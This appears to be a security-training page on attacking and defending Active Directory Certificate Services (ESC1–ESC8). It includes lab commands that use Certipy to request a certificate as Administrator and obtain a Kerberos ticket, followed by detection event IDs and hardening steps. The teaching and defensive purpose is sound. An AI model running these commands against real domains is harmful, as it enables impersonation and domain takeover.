Skip to main content
AD Academy
Attacks on AD
Advanced24 minLast updated: Topic 5 of 7

AD CS — ESC1–ESC8: Attacking the Certificate Authority

The internal certificate authority is the domain's «ID printer» — and a misconfigured template is a pass to Domain Admin.

Not read

What you will learn here

  • What AD CS is, what a certificate template is, and how Enrollment works
  • Which misconfigurations create ESC1–ESC8
  • How to find vulnerable templates with Certify / Certipy

Worth reading first:Shadow Credentials (msDS-KeyCredentialLink)

Theory — what is AD CS

Certificate Services () is the built-in certificate authority (CA) of Windows. It issues digital certificates to users, computers, and services — for authentication, encryption, and signing. The problem: a certificate can also serve as an authentication factor against () — meaning whoever obtains a certificate in someone else's name effectively obtains their identity.

A defines who may request a certificate, for what purpose, and which fields the requester may set themselves. Most organizations have never audited their templates — which is why is considered the fastest-growing attack vector against today, the «new ».

ESC1–ESC8 in brief

  • ESC1 — the template lets the requester set the Subject Alternative Name (SAN) + client authentication is allowed + Enrollment is open to everyone: request a certificate «in the name of» Administrator.
  • ESC2 — a template with «Any Purpose» or no EKU: suitable for everything, including authentication.
  • ESC3 — an Enrollment Agent template: one certificate allows requesting certificates on behalf of others.
  • ESC4 — write permissions on the template itself: whoever can edit a template turns it into ESC1.
  • ESC5 — powerful permissions on objects (CA, the CA computer, OID) — indirect exploitation of everything else.
  • ESC6 — the EDITF_ATTRIBUTESUBJECTALTNAME2 flag on the CA: every template becomes ESC1.
  • ESC7 — ManageCA/ManageCertificates rights on the CA: a CA manager can approve pending requests and issue certificates themselves.
  • ESC8 — against the HTTP interfaces (web enrollment): relay a computer's authentication to the CA server and get a certificate in its name.

Practice — lab only

# 1. Scanning vulnerable templates with Certify (Windows)
Certify.exe find /vulnerable
# Searching for: Supply in the request, Client Authentication, Enrollee Supplies Subject
powershell
# 2. Same scan from Linux with Certipy
certipy find -u attacker@corp.local -p 'Password123' -dc-ip 10.0.0.10 -vulnerable
bash
# 3. Exploitation ESC1: Request certificate as Administrator
certipy req -u attacker@corp.local -p 'Password123' \
  -ca CORP-CA -template VulnerableTemplate \
  -upn administrator@corp.local
# 4. Get TGT with the certificate
certipy auth -pfx administrator.pfx -dc-ip 10.0.0.10
bash

Detection

  • Event ID 4886/4887 on the CA — a certificate was received/issued: check for a SAN that does not match the requester.
  • Event ID 4768 — a with certificate authentication () for an account that should not use certificates.
  • Event ID 4898/4899 — a change in CA configuration (including EDITF_ATTRIBUTESUBJECTALTNAME2).
  • Certificate requests to one template in a short time from the same requester — a scanning/exploitation pattern.

Mitigation — the defense block (mandatory)

  • Template audit: run Certify find /vulnerable or Certipy in your own environment — find what the attacker would find, first.
  • Template hardening: remove «Supply in the request», restrict Enrollment to specific groups, enable Manager Approval and Enrollment Agent signatures where possible.
  • Remove the EDITF_ATTRIBUTESUBJECTALTNAME2 flag from the CA (blocks ESC6): certutil -config "CA" -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2.
  • ESC8: disable web enrollment if not required, or enforce HTTPS + Extended Protection for Authentication () on the HTTP interfaces.
  • Separate roles: whoever manages the CA should not be a Admin, and vice versa.
  • Monitor the Event IDs listed above in your — dedicated Sigma rules for abuse exist.

Check yourself

What makes a certificate template vulnerable in the ESC1 style?

What is ESC8?

Which Event ID on the CA records a certificate issuance?

What is the first defensive step against AD CS threats?

Was this page helpful?